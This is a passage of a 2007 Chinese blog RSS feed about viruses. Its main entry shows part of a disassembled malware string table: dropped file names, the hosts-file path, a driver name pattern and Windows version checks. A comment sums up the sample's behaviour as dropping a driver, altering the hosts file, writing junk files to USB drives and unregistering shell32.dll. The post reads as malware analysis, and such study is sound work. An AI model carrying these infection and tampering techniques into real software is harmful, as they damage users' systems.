.rdata:0041477C s_1_txt&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db '1.txt',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4040A0+64B o<br>
.rdata:00414782&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:00414784 s_1_bmp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db '1.bmp',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4040A0+4BB o<br>
.rdata:0041478A&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:0041478C s_1_exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db '1.exe',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4040A0+326 o<br>
.rdata:0041478C&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_4040A0+566 o<br>
.rdata:00414792&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:00414794 s_1_dll&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db '1.dll',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4040A0+1C5 o<br>
.rdata:00414794&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_4040A0+27E o<br>
.rdata:00414794&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_4040A0+3D9 o<br>
.rdata:0041479A&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:0041479C s_Usb8028x&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'usb8028x',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: .text:00412B40 o<br>
.rdata:004147A5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:004147A8 s_Usb8028&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'usb8028',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: .text:00412B60 o<br>
.rdata:004147B0 s_List&lt;t&gt;TooLon db 'list&lt;T&gt; too long',0 ; DATA XREF: sub_404FE0+2E o<br>
.rdata:004147C1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:004147C4 s_Hosts&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db '\hosts',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_405190+CD o<br>
.rdata:004147CB&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:004147CC s_System32Drive db '\System32\drivers\etc\hosts',0<br>
.rdata:004147CC&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_405190+9A o<br>
.rdata:004147E8 ; char s_WT[]<br>
.rdata:004147E8 s_WT&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'w+t',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4053A0:loc_4055B0 o<br>
.rdata:004147EC ; char s_Rt[]<br>
.rdata:004147EC s_Rt&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'rt',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4053A0:loc_405441 o<br>
.rdata:004147EF&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 10h<br>
.rdata:004147F0 ; char s_S_1[]<br>
.rdata:004147F0 s_S_1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db '%s',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4056F0+24 o<br>
.rdata:004147F0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_405760+24 o<br>
.rdata:004147F3&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:004147F4 off_4147F4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; dd offset sub_405740&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4056F0+12 o<br>
.rdata:004147F4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; .text:loc_405730 o<br>
.rdata:004147F4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_405740+8 o<br>
.rdata:004147F8 ; char s_S_sys[]<br>
.rdata:004147F8 s_S_sys&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db '%s.sys',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4056F0+C o<br>
.rdata:004147F8&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_405760+C o<br>
.rdata:004147FF&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 10h<br>
.rdata:00414800 off_414800&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; dd offset sub_4057B0&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_405760+12 o<br>
.rdata:00414800&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; .text:loc_4057A0 o<br>
.rdata:00414800&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_4057B0+8 o<br>
.rdata:00414804 s_WindowsServer db 'Windows Server 2003 family',0<br>
.rdata:00414804&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4057D0+147 o<br>
.rdata:0041481F&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 10h<br>
.rdata:00414820 s_WindowsXp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'Windows XP',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4057D0+12D o<br>
.rdata:0041482B&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:0041482C s_Windows2000&nbsp;&nbsp;&nbsp; db 'Windows 2000',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4057D0+113 o<br>
.rdata:00414839&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:0041483C s_WindowsNt4_0&nbsp;&nbsp; db 'Windows NT 4.0',0&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4057D0+F1 o<br>
.rdata:0041484B&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:0041484C s_WindowsNt3_51 db 'Windows NT 3.51',0&nbsp;&nbsp; ; DATA XREF: sub_4057D0+D7 o<br>
</p>
<p><font color="#0000ff"><strong>//判断操作系统类型，如果是NT内核系统，写入驱动、修改host文件、对移动存储设备写入5个垃圾文件、反注册shell32.dll</strong></font></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/renlangliu/blog/category/%B2%A1%B6%BE%CB%EA%D4%C2">病毒岁月</a>&nbsp;<a href="http://hi.baidu.com/renlangliu/blog/item/ae576c3ef73f743c70cf6c1c.html#comment">查看评论</a>]]></description>
        <pubDate>2007-05-25  12:31</pubDate>
        <category><![CDATA[病毒岁月]]></category>
        <author><![CDATA[renlangliu]]></author>
		<guid>http://hi.baidu.com/renlangliu/blog/item/ae576c3ef73f743c70cf6c1c.html</guid>
</item>

<item>
        <title><![CDATA[一张图片]]></title>
        <link><![CDATA[http://hi.baidu.com/renlangliu/blog/item/818d68892756b3b20f24442d.html]]></link>
        <description><![CDATA[
		
		<div forimg="1"><img border="0" small="0" class="blogimg" src="http://hiphotos.baidu.com/renlangliu/pic/item/e275f6dd617203ea76c638cd.jpg"></div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/renlangliu/blog/category/%B2%A1%B6%BE%CB%EA%D4%C2">病毒岁月</a>&nbsp;<a href="http://hi.baidu.com/renlangliu/blog/item/818d68892756b3b20f24442d.html#comment">查看评论</a>]]></description>
        <pubDate>2007-05-24  21:28</pubDate>
        <category><![CDATA[病毒岁月]]></category>
        <author><![CDATA[renlangliu]]></author>
		<guid>http://hi.baidu.com/renlangliu/blog/item/818d68892756b3b20f24442d.html</guid>
</item>


</channel>
</rss>